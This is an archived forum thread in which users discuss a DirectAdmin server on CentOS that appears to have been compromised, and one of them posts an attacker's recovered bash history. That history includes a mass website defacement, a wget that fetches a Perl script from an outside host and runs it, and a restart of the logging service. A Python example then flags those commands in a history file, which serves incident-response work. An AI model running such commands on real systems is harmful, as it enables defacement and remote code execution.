View Full Version : DirectAdmin not working on CentOS 5.5



NH-hosting
12-28-2010, 02:41 PM
Hello,

I've been having some trouble with DirectAdmin.
A short while ago I had some serious trouble with the server; somehow several files, including binaries, were deleted.
I never found out why, but since then DirectAdmin no longer works.

Apache is running and it seems to work, yet I also can't load any html on port 80.
I'm trying to connect through the IP address, so I'm sure it's not a DNS error, FTP also works.

I have no idea what exactly is wrong; httpd.conf does not contain any errors, or none I've found.
I'm using CentOS 5.5 with the latest version of DirectAdmin, I hope someone else knows what may be wrong.

Richard G
12-28-2010, 04:55 PM
Binaries got deleted???
If that's the case, you'd best reinstall your server.

However, you should check your logs to see what caused it. Could be hackers, could also be malfunctioning hardware like a hard disk.

The following files might tell you more:
/var/log/messages
/var/log/secure
/var/log/xferlog
/var/log/httpd/error_log
/var/log/httpd/homedir.log
and /var/log/httpd/access.log

If it was a hacker and they had root access, check:
/root/.bash_history
You might be lucky and get a history of what's done.

But if binaries and other files are really deleted, it mostly is not a hardware error but root error or hackers.

AndyII
01-19-2011, 12:58 PM
I know I need to reformat and start over ... and I am,
as soon as I get all sites repaired and backed up
(private server so I don't have too many),
but I went and looked at bash history.
Some pointers on how to plug this hole?
I am hoping that the new OS and Apache, PHP, etc. will stop most of this.


id
locate "httpd.conf"
whereis httpd.conf
pwd
ls
rm *
cat /usr/local/apache/conf/httpd.conf
cat /usr/local/directadmin/data/users/*/httpd.conf |grep ServerName
cat /usr/local/directadmin/data/users/*/httpd.conf | grep ServerName | uniq
pwd
cat /usr/local/directadmin/data/users/*/httpd.conf |grep DocumentRoot
echo "haCked By T0r3x :]" > /tmp/index.html
cat /tmp/index.html
find /home -name "index.*" -exec cp /tmp/index.html {} \;
id
pwd
ls
cd ..
find own
rm -rf own
find own
wget woodcoinc.us/x/log.txt;mv log.txt log.pl; find log.txt log.pl
pwd
find own log.txt log.pl
perl log.pl
service syslogd restart
syslogd start
chkconfig --list syslog
/etc/init.d/syslog start
top
reboot
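
Added example, not part of any post in this thread: a small Python triage pass over a shell history, following Richard G's suggestion to read /root/.bash_history. It tags downloads, execution of a downloaded file (followed through renames), bulk file changes via find -exec, and commands touching syslog; the `triage` function, the tag names and the sample lines (with the placeholder host `files.example.invalid`) are constructed for illustration.

```python
import re
import shlex

FETCHERS = {"wget", "curl", "fetch"}
INTERPRETERS = {"perl", "python", "php", "sh", "bash"}

def base(path):
    """Last path component, so /etc/init.d/syslog and syslog compare equal."""
    return path.rstrip("/").rsplit("/", 1)[-1]

def triage(history_lines):
    """Return (line_no, tag, command) findings for a shell history file."""
    fetched = set()   # basenames of downloaded files, followed through mv/cp
    findings = []
    for no, line in enumerate(history_lines, 1):
        # Naive split on ; && || | (ignores quoting, but leaves find's "\;" alone).
        for cmd in re.split(r"(?<!\\);|&&|\|\||\|", line):
            try:
                argv = shlex.split(cmd)
            except ValueError:          # unbalanced quotes: fall back to whitespace
                argv = cmd.split()
            if not argv:
                continue
            prog, args = base(argv[0]), argv[1:]
            names = [base(a) for a in args if not a.startswith("-")]
            tag = None
            if prog in FETCHERS:
                fetched.update(names)
                tag = "network-fetch"
            elif prog in ("mv", "cp") and len(names) == 2 and names[0] in fetched:
                fetched.add(names[1])   # keep following the file after a rename
            elif prog in INTERPRETERS and fetched.intersection(names):
                tag = "exec-fetched-file"
            elif prog == "find" and "-exec" in args[:-1] and \
                    base(args[args.index("-exec") + 1]) in ("cp", "mv", "rm"):
                tag = "bulk-file-change"
            elif prog.startswith("syslog") or (
                    prog in ("service", "chkconfig")
                    and any("syslog" in a for a in args)):
                tag = "logging-service-touched"
            if tag:
                findings.append((no, tag, cmd.strip()))
    return findings

# Constructed sample input (placeholder host, not a real indicator).
SAMPLE = ["id", "cat /usr/local/directadmin/data/users/*/httpd.conf | grep ServerName | uniq",
          'find /home -name "index.*" -exec cp /tmp/index.html {} \\;',
          "wget files.example.invalid/x/log.txt;mv log.txt log.pl; find log.txt log.pl",
          "perl log.pl", "service syslogd restart", "/etc/init.d/syslog start"]

if __name__ == "__main__":
    for no, tag, cmd in triage(SAMPLE):
        print(f"{no:>3}  {tag:<24} {cmd}")
```

A history file only shows what the shell recorded and can be edited by whoever held root, so findings here are leads to confirm against the other logs listed above.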

nobaloney
01-21-2011, 10:45 AM
@AndyII:

Did you post in the wrong thread? I've already responded in the other thread.

Jeff

AndyII
02-02-2011, 04:03 PM
Was commenting on Richard's post about the bash history and what I had found in mine, because they gained access here means I need to plug that hole, and how much of it would be covered with all the new OS and other services......
Thanks to Richard for the tip :)
Plus I too am running CentOS.